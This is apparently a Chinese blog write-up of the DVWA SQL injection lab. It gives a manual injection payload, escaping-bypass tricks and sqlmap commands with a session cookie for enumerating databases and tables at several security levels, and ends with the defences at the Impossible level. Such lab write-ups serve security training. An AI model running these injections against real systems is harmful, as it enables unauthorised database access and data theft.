DVWA--SQLInjection

Low 等级

1.手工方法

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

注入poc为:1’ or ‘1’=’1

确定查询字段数

在这里插入图片描述在这里插入图片描述
确定回显点
在这里插入图片描述
数据库名为dvwa
在这里插入图片描述
表名为guestbook,users
在这里插入图片描述
2.使用sqlmap进行注入
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=low"
注入类型
在这里插入图片描述
数据库名
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=low" --current-db
在这里插入图片描述
表名

python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=low"  -D dvwa --tables

在这里插入图片描述

Medium 等级

请求方式变为post
在这里插入图片描述
确定注入poc

在这里插入图片描述

报错
在这里插入图片描述
查看源码,发现使用mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
(受影响字符:\x00,\n,\r,\,’,",\x1a)
在这里插入图片描述
1.对dvwa进行hex编码,获得表名

在这里插入图片描述
2.使用(select database())代替’dvwa’
在这里插入图片描述
3.使用sqlmap获取表名

  python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=medium" -D dvwa --tables

在这里插入图片描述

High 等级

1.手工方法
确定注入poc

在这里插入图片描述在这里插入图片描述
2.使用sqlmap

python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/session-input.php" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=high" --second-url "https://dvwa.practice.rois.io/vulnerabilities/sqli/" -D dvwa --tables在这里插入图片描述

Impossible 等级

检测了id数据类型,使用了预编译绑定id变量,并参数化SQL语句,
有效防止了SQL注入
同时只有查询返回结果数量是1时才显示结果,有效防范了脱库

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值